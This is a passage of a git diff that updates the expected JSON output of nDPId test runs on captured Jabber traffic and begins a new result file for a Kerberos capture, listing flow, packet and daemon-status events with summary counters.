+00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"jabber.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1504181789366,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1504181789366,"pkt":"AAwpvhIxAFBWwAAICABFAAAodxpAAIAGjcrAqDoBwKg6mdDUFGaBHPlYcsirFVAQAQA7WwAAAAAAAAAA"} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":294,"source":"jabber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1504181789350,"flow_last_seen":1504181789367,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1504181789367,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} 
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":302,"source":"jabber.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1502379723841,"flow_last_seen":1502379726010,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13812,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1504181789418,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57094,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":302,"source":"jabber.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":86,"flow_first_seen":1502380175298,"flow_last_seen":1502380177456,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":13811,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1504181789418,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57122,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":302,"source":"jabber.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1502380249631,"flow_last_seen":1502380673059,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":3489,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1504181789418,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57129,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":302,"source":"jabber.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1502380915481,"flow_last_seen":1502381571702,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":463,"flow_tot_l4_payload_len":3658,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1504181789418,"l3_proto":"ip4","src_ip":"172.16.0.62","dst_ip":"172.16.1.138","src_port":57149,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":302,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":302,"packets-processed":283,"total-skipped-flows":0,"total-l4-payload-len":36369,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":7,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":7,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":47,"global_ts_msec":1642668994159} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":302,"source":"jabber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642668994159,"flow_last_seen":1642668994159,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1642668994159,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":34218,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"jabber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1642668994159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642668994159,"pkt":"eJS0JASgYDjgxTWgCABFAAA800FAAD8GO9vAqAJkoCzJZoWqFGdT1L5OAAAAAKAC\/\/8mUQAAAgQFtAQCCAoBJke0AAAAAAEDAwg="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"jabber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1642668994188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1642668994188,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGGi2gLMlmwKgCZBRnhar53fA8U9S+T2ASchBjHgAAAgQFrAAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":304,"source":"jabber.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1642668994235,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1642668994235,"pkt":"eJS0JASgYDjgxTWgCABFAAAo00JAAD8GO+7AqAJkoCzJZoWqFGdT1L5P+d3wPVAQ\/\/\/s4wAA"} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"jabber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1642668994159,"flow_last_seen":1642668994588,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1642668994588,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":34218,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00679{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":315,"source":"jabber.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1504181789350,"flow_last_seen":1504181789418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":157,"flow_avg_l4_payload_len":12,"midstream":0,"thread_ts_msec":1642669000423,"l3_proto":"ip4","src_ip":"192.168.58.1","dst_ip":"192.168.58.153","src_port":53460,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":317,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":317,"packets-processed":298,"total-skipped-flows":0,"total-l4-payload-len":36788,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":8,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":54,"global_ts_msec":1642778258433} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":317,"source":"jabber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1642778258433,"flow_last_seen":1642778258433,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1642778258433,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":37614,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"jabber.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1642778258433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1642778258433,"pkt":"eJS0JASgYDjgxTWgCABFAAA8d8hAAD8Gl1TAqAJkoCzJZpLuFGecNBm6AAAAAKAC\/\/9wIgAAAgQFtAQCCAoBEkznAAAAAAEDAwg="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"jabber.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1642778258461,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1642778258461,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGGi2gLMlmwKgCZBRnku46NBuqnDQZu2ASchBGSwAAAgQFrAAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"jabber.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1642778258465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1642778258465,"pkt":"eJS0JASgYDjgxTWgCABFAAAod8lAAD8Gl2fAqAJkoCzJZpLuFGecNBm7OjQbq1AQ\/\/\/QEAAA"} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":325,"source":"jabber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1642778258433,"flow_last_seen":1642778258598,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1642778258598,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":37614,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":327,"source":"jabber.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1642668994159,"flow_last_seen":1642669300354,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1642778258609,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":34218,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00557{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":332,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":332,"packets-processed":313,"total-skipped-flows":0,"total-l4-payload-len":37207,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":9,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":61,"global_ts_msec":1643022225544} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":332,"source":"jabber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643022225544,"flow_last_seen":1643022225544,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1643022225544,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":58388,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":332,"source":"jabber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1643022225544,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1643022225544,"pkt":"eJS0JASgYDjgxTWgCABFAAA8zN5AAD8GQj7AqAJkoCzJZuQUFGd9pY4kAAAAAKAC\/\/92oQAAAgQFtAQCCAoAzZ+rAAAAAAEDAwg="} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":333,"source":"jabber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1643022225570,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1643022225570,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGGi2gLMlmwKgCZBRn5BT7kgHsfaWOJWASchD3qAAAAgQFrAAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":334,"source":"jabber.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1643022225781,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1643022225781,"pkt":"eJS0JASgYDjgxTWgCABFAAAozN9AAD8GQlHAqAJkoCzJZuQUFGd9pY4l+5IB7VAQ\/\/+BbgAA"} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"jabber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1643022225544,"flow_last_seen":1643022225994,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1643022225994,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":58388,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":342,"source":"jabber.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1642778258433,"flow_last_seen":1642778652221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1643022226078,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":37614,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":347,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":347,"packets-processed":328,"total-skipped-flows":0,"total-l4-payload-len":37629,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":10,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":10,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":68,"global_ts_msec":1644679789249} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":347,"source":"jabber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1644679789249,"flow_last_seen":1644679789249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1644679789249,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":41420,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"jabber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1644679789249,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1644679789249,"pkt":"eJS0JASgYDjgxTWgCABFAAA86SVAAD8GJffAqAJkoCzJZqHMFGfTtLH2AAAAAKAC\/\/\/oLAAAAgQFtAQCCAoAcfbiAAAAAAEDAwg="} +00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"jabber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1644679789279,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1644679789279,"pkt":"YDjgxTWgeJS0JASgCABFAAAsAABAADQGGi2gLMlmwKgCZBRnocwJMPUa07Sx92ASchC\/QwAAAgQFrAAA"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"jabber.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1644679789281,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1644679789281,"pkt":"eJS0JASgYDjgxTWgCABFAAAo6SZAAD8GJgrAqAJkoCzJZqHMFGfTtLH3CTD1G1AQ\/\/9JCQAA"} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":357,"source":"jabber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1644679789249,"flow_last_seen":1644679789719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":337,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1644679789719,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":41420,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":361,"source":"jabber.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1643022225544,"flow_last_seen":1643022526197,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":422,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1644679789757,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":58388,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":362,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":362,"packets-processed":343,"total-skipped-flows":0,"total-l4-payload-len":38037,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":11,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":11,"total-idle-flows":10,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":75,"global_ts_msec":1655985683694} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":362,"source":"jabber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655985683694,"flow_last_seen":1655985683694,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655985683694,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":34070,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":362,"source":"jabber.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1655985683694,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655985683694,"pkt":"eJS0JASgYDjgxTWgCABFAAA8eV5AAD8Glb7AqAJkoCzJZoUWFGfmtmUZAAAAAKAC\/\/8wrwAAAgQFtAQCCAoAZQT+AAAAAAEDAwg="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"jabber.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1655985683717,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1655985683717,"pkt":"YDjgxTWgeJS0JASgCABFAAAwAABAADQGGimgLMlmwKgCZBRnhRZwZZi25rZlGnASchD1\/AAAAgQFrAEBBAI="} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"jabber.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1655985683721,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1655985683721,"pkt":"eJS0JASgYDjgxTWgCABFAAAoeV9AAD8GldHAqAJkoCzJZoUWFGfmtmUacGWYt1AQ\/\/+UyQAA"} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":370,"source":"jabber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1655985683694,"flow_last_seen":1655985683872,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1655985683872,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":34070,"dst_port":5223,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":375,"source":"jabber.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1644679789249,"flow_last_seen":1644679824897,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":408,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1655985690292,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":41420,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":376,"source":"jabber.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655985683694,"flow_last_seen":1655985963406,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":419,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1655985963406,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"160.44.201.102","src_port":34070,"dst_port":5223,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Jabber","breed":"Acceptable","category":"Web"}} 
+00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":376,"source":"jabber.pcap","alias":"nDPId-test","packets-captured":376,"packets-processed":358,"total-skipped-flows":0,"total-l4-payload-len":38456,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":12,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":12,"total-idle-flows":12,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":83,"global_ts_msec":1655985963406} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ -~~ packets captured/processed: 13/13 +~~ packets captured/processed: 376/358 ~~ skipped flows.............: 0 -~~ total layer4 data length..: 157 bytes -~~ total detected protocols..: 1 -~~ total active/idle flows...: 1/1 +~~ total layer4 data length..: 38456 bytes +~~ total detected protocols..: 12 +~~ total active/idle flows...: 12/12 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871868 bytes -~~ total memory freed........: 5871868 bytes -~~ total allocations/frees...: 118128/118128 +~~ total memory allocated....: 6049695 bytes +~~ total memory freed........: 6049695 bytes +~~ total allocations/frees...: 121290/121290 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ json string min len.......: 460 chars -~~ json string max len.......: 683 chars -~~ json string avg len.......: 560 chars +~~ json string min len.......: 457 chars +~~ json string max len.......: 1017 chars +~~ json string avg len.......: 737 chars diff --git a/test/results/kerberos-error.pcap.out b/test/results/kerberos-error.pcap.out new file mode 100644 index 000000000..46151b5bb --- /dev/null +++ b/test/results/kerberos-error.pcap.out 
@@ -0,0 +1,23 @@ +00465{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"kerberos-error.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} +00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"kerberos-error.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1645515964250} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos-error.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1645515964250,"flow_last_seen":1645515964250,"flow_idle_time":200000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1645515964250,"l3_proto":"ip4","src_ip":"148.151.79.183","dst_ip":"144.199.10.233","src_port":34473,"dst_port":88,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
